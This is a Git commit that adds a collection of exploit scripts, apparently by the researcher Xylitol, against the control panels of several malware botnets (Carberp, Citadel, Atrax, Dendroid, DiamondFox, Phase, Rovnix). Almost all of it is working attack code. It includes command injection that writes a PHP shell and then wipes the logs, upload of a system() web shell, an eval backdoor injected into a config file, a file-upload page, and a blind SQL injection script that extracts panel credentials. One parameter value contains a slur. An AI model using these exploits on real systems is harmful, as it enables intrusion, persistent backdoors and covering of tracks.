exploits from xyl2k
misterch0c committed Jan 5, 2016
1 parent 039f59e commit 686d940
Showing 11 changed files with 411 additions and 9 deletions.
56 changes: 56 additions & 0 deletions Banking/caberp.md
@@ -0,0 +1,56 @@
#### Caberp


Type: Remote Code Execution

Author: [Xylitol](https://twitter.com/Xylit0l)

```
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if(!isset($_POST['urlz'])) ;
else
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
{
echo "<font color='red'>URL is not valid</font>";
}
else
{
{
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => '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');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);
curl_close($ch);
if (preg_match("#-#", $contents))
{ echo "<pre>" . $contents . "</pre>"; }
else
{ echo "<font color='red'>Not vulnerable :(</font>"; }
}
}
?></td>
</tr>
</table>
```
54 changes: 53 additions & 1 deletion Banking/citadel.md
@@ -1,6 +1,58 @@
#### Citadel

```
Type: SQLi
```
Vuln: http://localhost/cp.php?bots=1
```

Type: Remote Code Execution

Author: [Xylitol](https://twitter.com/Xylit0l)


```
import urllib
import urllib2
# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
# Work only on windows box
def request(url, params=None, method='GET'):
if method == 'POST':
urllib2.urlopen(url, urllib.urlencode(params)).read()
elif method == 'GET':
if params == None:
urllib2.urlopen(url)
else:
urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()
def uploadShell(url, filename, payload):
data = {
'b' : 'tapz',
'p1' : 'faggot',
'p2' : 'hacker | echo "' + payload + '" >> ' + filename
}
request(url + 'test.php', data)
def shellExists(url):
return urllib.urlopen(url).getcode() == 200
def cleanLogs(url):
delete = {
'delete' : ''
}
request(URL + 'control.php', delete, 'POST')
URL = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD = '<?php phpinfo(); ?>'
uploadShell(URL, FILENAME, PAYLOAD)
print '[~] Shell created!'
if not shellExists(URL + FILENAME):
print '[-]', FILENAME, 'not found...'
else:
print '[+] Go to:', URL + FILENAME
cleanLogs(URL)
print '[~] Logs cleaned!'
```
98 changes: 98 additions & 0 deletions Http Botnets/atrax.md
@@ -0,0 +1,98 @@
#### Atrax


Type: Shell Upload Vulnerability

Author: [Xylitol](https://twitter.com/Xylit0l)

```
import random
import string
import base64
import urllib
import urllib2
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url = 'http://localhost/atrax/'
# </CONFIG>
BOT_MODE_INSERT = 'b' # BOT MODE
BOT_MODE_RUNPLUGIN = 'e'
GET_PARAM_MODE = 'a' # GET PARAM
POST_PARAM_GUID = 'h' # POST PARAM
POST_PARAM_IP = 'i'
POST_PARAM_BUILDID = 'j'
POST_PARAM_PC = 'k'
POST_PARAM_OS = 'l'
POST_PARAM_ADMIN = 'm'
POST_PARAM_CPU = 'n'
POST_PARAM_GPU = 'o'
POST_PARAM_PLUGINNAME = 'q'
def request(url, get, post):
if not get == '':
url += '?' + get
encoded = {}
if not post == '':
for _ in post.split('&'):
data = _.split('=')
encoded[data[0]] = data[1]
encoded = urllib.urlencode(encoded)
request = urllib2.Request(url, encoded)
response = urllib2.urlopen(request)
page = response.read()
return page
def queryValue(key, value, next=True):
ret = key + '=' + value
if next:
ret += '&'
return ret
def randomString(length = 8):
return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
def createVictim(url, guid, ip):
get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
post = queryValue(POST_PARAM_GUID, guid)
post += queryValue(POST_PARAM_IP, ip)
post += queryValue(POST_PARAM_BUILDID, randomString())
post += queryValue(POST_PARAM_PC, randomString())
post += queryValue(POST_PARAM_OS, randomString())
post += queryValue(POST_PARAM_ADMIN, 'yes')
post += queryValue(POST_PARAM_CPU, randomString())
post += queryValue(POST_PARAM_GPU, randomString(), False)
return request(url + 'auth.php', get, post)
def exploit(url, guid, ip, file, payload):
get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
post += queryValue(POST_PARAM_GUID, guid)
post += queryValue(POST_PARAM_IP, ip)
post += queryValue('am', randomString())
post += queryValue('ad', file)
post += queryValue('ab', base64.b64encode(payload))
post += queryValue('ai', '18', False)
request(url + 'auth.php', get, post)
def testExploit(url, guid, ip):
file = randomString() + '.php'
payload = '<?php echo("1337"); ?>'
exploit(url, guid, ip, file, payload)
return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
guid = '7461707a7461707a7461707a7461707a'
ip = '91.224.13.103'
file = randomString() + '.php'
if createVictim(url, guid, ip).strip() == 'STOP':
print '[-] Cannot create victim...'
else:
print '[~] Victim created/updated...'
if testExploit(url, guid, ip):
exploit(url, guid, ip, file, payload)
print '[+] Exploit uploaded!'
print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
else:
print '[-] Cannot upload payload, maybe the plugin is not actived?'
```
37 changes: 37 additions & 0 deletions Http Botnets/dendroid.md
@@ -0,0 +1,37 @@
#### Dendroid


Type: Remote Code Execution

Author: [Xylitol](https://twitter.com/Xylit0l)

```
import requests
# Add URL
# Set a PHP payload
# Go to http://website/config.php
URL = 'http://localhost/Panel/applysettings.php'
PAYLOAD = "(isset($_GET['tapz'])) ? eval($_GET['tapz']) : '"
data = {
'dbhost' : 'localhost',
'dbname' : 'dendroid',
'dbusername' : 'root',
'dbpassword' : '',
'username' : 'admin',
'password' : 'admin',
'postboxsize' : '10',
'devicetablerefr' : '10000',
'filetablerefr' : '10000',
'historyboxrefr' : '5000',
'botoffline' : '60',
'timezone' : "Europe/Brussels';" + PAYLOAD,
'messageboxscroll' : 'Yes',
}
headers = { 'Host': '127.0.0.1' }
req = requests.post(URL, data=data, headers=headers)
print 'HACKED!'
```
33 changes: 33 additions & 0 deletions Http Botnets/diamond.md
@@ -0,0 +1,33 @@
#### Gorynych/DiamondFox v4.2.0.257


Type: File Upload Vulnerability

Author: [Xylitol](https://twitter.com/Xylit0l)

```
<!DOCTYPE html>
<html>
<head>
<title>Gorynych v4.2.0.257- File Upload Vulnerability</title>
<!-- Panel.zip hash: e698cf7cc57b20c02fce6de83299b75b -->
</head>
<body>
<h1>&#9673; Gorynych/DiamondFox v4.2.0.257 - File Upload Vulnerability &#9673;</h1>
<form action="http://localhost/Panel/post.php" method="POST" enctype="multipart/form-data">
<input type="file" name="upload1">
<input type="hidden" name="slots" value="1">
<input type="submit" value="PWN!"">
</form>
File naming convention:<br>
&#9733; file.log.php (go to logs/dump/file.log.php)<br>
&#9733; file.jpg.php (go to logs/scr/file.jpg.php)<br>
&#9733; file.LOG.php (go to logs/pass/file.LOG.php)<br>
&#9733; file.txt.php (go to logs/ftp/file.txt.php)<br>
&#9733; file.TXT.php (go to logs/rdp/file.TXT.php)<br>
&#9733; file.TxT.php (go to logs/mail/file.TxT.php)<br>
&#9733; file.html.php (go to logs/kyl/file.html.php)<br>
&#9733; file.wallet.php (go to logs/wallet/file.wallet.php)
</body>
</html>
```
55 changes: 55 additions & 0 deletions Http Botnets/phase.md
@@ -0,0 +1,55 @@
#### Phase Botnet

Type: Blind SQL injection vulnerability

Author: [Xylitol](https://twitter.com/Xylit0l)

```
<?php
// Start with PHP CLI (php pwn.php)
set_time_limit(0);
// Adjust this :)
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
get_string('username');
get_string('password');
function get_length($field) {
$length = 1;
while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
++$length;
}
echo($field . ' length: ' . $length . PHP_EOL);
return $length;
}
function get_string($field) {
$length = get_length($field);
$str = '';
for ($i = 0; $i < $length; ++$i) {
$str .= chr(get_char($field, $i));
echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
}
return $str;
}
function get_char($field, $id) {
$binary = '';
for ($i = 1; $i < 256; $i *= 2) {
if ($i == 128)
$binary = '0' . $binary;
else
$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
```
55 changes: 55 additions & 0 deletions Http Botnets/rovnix.md
@@ -0,0 +1,55 @@
#### Rovnix


Type: Hash Collision

Author: [Xylitol](https://twitter.com/Xylit0l)

```
<?php
/**
* Defeat the weak hash function of Rovnix
* to get password from a hash.
*/
$HASH = 'fbff791ef0770855e599ea6f87d41653';
$value = getNumber($HASH);
$search = search($value, $HASH);
echo('Hash: ' . $HASH . '<br />');
echo('Value: ' . $value . '<br />');
echo('Search: ' . $search);
// Search an working (number) password
function search($value, $hash) {
$i = 0;
while (true) {
if (getHash($i) == $value)
return $i;
$i++;
}
}
// Get the hashed number
function getNumber($hash) {
$i = 0;
while (true) {
if (md5($i) == $hash)
return $i;
$i++;
}
}
// Hash function without final MD5 (return only numbers)
function getHash($hash) {
$salt = 'LKJFDJLJkkljKJKJKJkjkj$i%&@(%jkjJn@@j$r@!cdh*!@#$djl1J$r!j@o*$@duJxlJLEKJkJFKJEJ2$jkeJFJLEJFE';
return $hash + $salt + md5($salt) + md5($hash) + $salt[3];
}
?>
```
